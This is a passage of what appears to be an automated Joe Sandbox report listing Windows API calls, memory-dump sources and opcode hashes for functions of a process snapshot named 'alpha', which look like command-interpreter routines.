                                                                                                  • Instruction Fuzzy Hash: 48515A71E1DA4285FA50AB12A8541B8FBA0FF48792FF44479D94D43BA5DFBCA840C731
                                                                                                  APIs
                                                                                                  • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF1BA
                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF1E7
                                                                                                  • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF1FF
                                                                                                  • iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF2BB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: iswdigit$iswspacewcschr
                                                                                                  • String ID: )$=,;
                                                                                                  • API String ID: 1959970872-2167043656
                                                                                                  • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                  • Instruction ID: da3cff2a6f832bd824073dc7aaf11a91906df6067eb55a101782b1e7d9b46f9e
                                                                                                  • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                  • Instruction Fuzzy Hash: 90417F65E1821386FBA47B1195A8379FAA0BF10747FF45079C94D039E4CFBCA885C631
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                  • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                  • API String ID: 3625580822-2781220306
                                                                                                  • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                  • Instruction ID: 7c6acc6491403046f7dedff513f7441e51f2b18674e9a98a650669fee602dfb9
                                                                                                  • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                  • Instruction Fuzzy Hash: 5F31E521A1864AA1EF10BF42E5201B9F660BF45B96FA44178CD1E17FA5DFBCE485C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcsspn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3809306610-0
                                                                                                  • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                  • Instruction ID: 51549d999f0816f26f5b8644d7aacf9e9fa5ff55f8bde161b7bfcbec848e1eef
                                                                                                  • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                  • Instruction Fuzzy Hash: B1B1C576A08B4691EA50EF15E4602B9F7A0FB44B81FE4807ACA4D57F94DFBCE845C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$iswdigit$wcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 3841054028-0
                                                                                                  • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                  • Instruction ID: 0fba01d4cb4b86c207badb31a2165b7589d8cf0c13993b583ccf1a37fe3315b5
                                                                                                  • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                  • Instruction Fuzzy Hash: D2512C27A0475281EF68AB15E4205B9F6A1FF68752BE48136EE5D43AD4DF7CE881C320
                                                                                                  APIs
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823F3687
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7823D260D), ref: 00007FF7823F36A6
                                                                                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7823D260D), ref: 00007FF7823F36EB
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823F3703
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7823D260D), ref: 00007FF7823F3722
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$Write_get_osfhandle$Mode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1066134489-0
                                                                                                  • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                  • Instruction ID: ca5306ad4356cac1368e7e02622ad61e4e5c6da84d8efe0c6ba5153c0bc561be
                                                                                                  • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                  • Instruction Fuzzy Hash: DB51C765B0968297EF646F21E464579E690FF44792FA84079DE0E07F90DFBCE444CB20
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                  • String ID:
                                                                                                  • API String ID: 850181435-0
                                                                                                  • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                                  • Instruction ID: ab6de0db48675df47cc683d9f009f9cfdb5be3c0029cbe4223905549a8417287
                                                                                                  • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                                  • Instruction Fuzzy Hash: F341B136608BC1C9E7709F21D8542E9BBA0FB89B45FA44465DA4D47F48CF78D98AC720
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
                                                                                                    • Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
                                                                                                    • Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
                                                                                                    • Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
                                                                                                    • Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
                                                                                                    • Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602
                                                                                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E3514
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823E3522
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E3541
                                                                                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E355E
                                                                                                    • Part of subcall function 00007FF7823E36EC: _get_osfhandle.MSVCRT ref: 00007FF7823E3715
                                                                                                    • Part of subcall function 00007FF7823E36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E3770
                                                                                                    • Part of subcall function 00007FF7823E36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3791
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 4057327938-0
                                                                                                  • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                  • Instruction ID: efa13fe1829258778baaaaa58ca54e200d161f884b8a5a0a58bad873d7d18190
                                                                                                  • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                  • Instruction Fuzzy Hash: 94316125F08A4296E7507B26E41017DFAA0FF89B52FE441B9DD0E43F95DEACE848C630
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                  • String ID: KEYS$LIST$OFF
                                                                                                  • API String ID: 411561164-4129271751
                                                                                                  • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                  • Instruction ID: b8951ee0f8c617afb10807f6b58249041a308d21599d7a132163134c16590677
                                                                                                  • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                  • Instruction Fuzzy Hash: E92195A0A0860291FA54BB25B450179E662FB58B52FE09279C61E476E5EFBCD884C630
                                                                                                  APIs
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823E01C4
                                                                                                  • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E0212
                                                                                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E0228
                                                                                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E023C
                                                                                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E0251
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 513048808-0
                                                                                                  • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                  • Instruction ID: e5274936e210dbfb1df6d6455197fbf0e0d4b3d34493897929b7c8e3887eca53
                                                                                                  • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                  • Instruction Fuzzy Hash: D3216B25A1868297E6506B61E594278FED0FF49756FB44178DA1E07AD0CEFCA888C720
                                                                                                  APIs
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823E3584
                                                                                                  • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
                                                                                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
                                                                                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
                                                                                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 513048808-0
                                                                                                  • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                  • Instruction ID: 0f3aee97d9ddf9b05e809eaedb01eed5d963316ed64bb8a2c90cd7bfb08e7c98
                                                                                                  • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                  • Instruction Fuzzy Hash: 06118125A0864292EB506B25E494038EFA0FB49766FA45378D92E03BD0DEBCD888C720
                                                                                                  APIs
                                                                                                  • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F71F9
                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F720D
                                                                                                  • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F7300
                                                                                                    • Part of subcall function 00007FF7823F5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7823F75C4,?,?,00000000,00007FF7823F6999,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F5744
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                  • String ID: _p0$wil
                                                                                                  • API String ID: 455305043-1814513734
                                                                                                  • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                  • Instruction ID: 1041f714448bf5376630eea8658d85bf58a3c57c31ecc90675b25a22cfff586e
                                                                                                  • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                  • Instruction Fuzzy Hash: 0361D862B18B42A1EF65EF55E4201B9A3A1FF84B81FE4447ADA0E07B54DF7CD905C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                  • String ID: %s
                                                                                                  • API String ID: 2401724867-3043279178
                                                                                                  • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                  • Instruction ID: 1bb73c4abcffcd3b7e2fbceec2820bdb633abaffda297d67db3325387fc88cb7
                                                                                                  • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                  • Instruction Fuzzy Hash: 7B51EA72B0868285EF61AF21D8102F9B3A0FB45B86FA44178DA8D47B94EFBCD445C730
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: iswdigit
                                                                                                  • String ID: GeToken: (%x) '%s'
                                                                                                  • API String ID: 3849470556-1994581435
                                                                                                  • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                  • Instruction ID: 53cdf4bcb955954f4548486480cf322aacc08aaa642334cc9623a53cc1773903
                                                                                                  • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                  • Instruction Fuzzy Hash: 9A519B31A0865286E764BF16E458279BBA0FF44B46FE08479DA4D43B90DFBCE884C730
                                                                                                  APIs
                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F9A10
                                                                                                  • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F9994
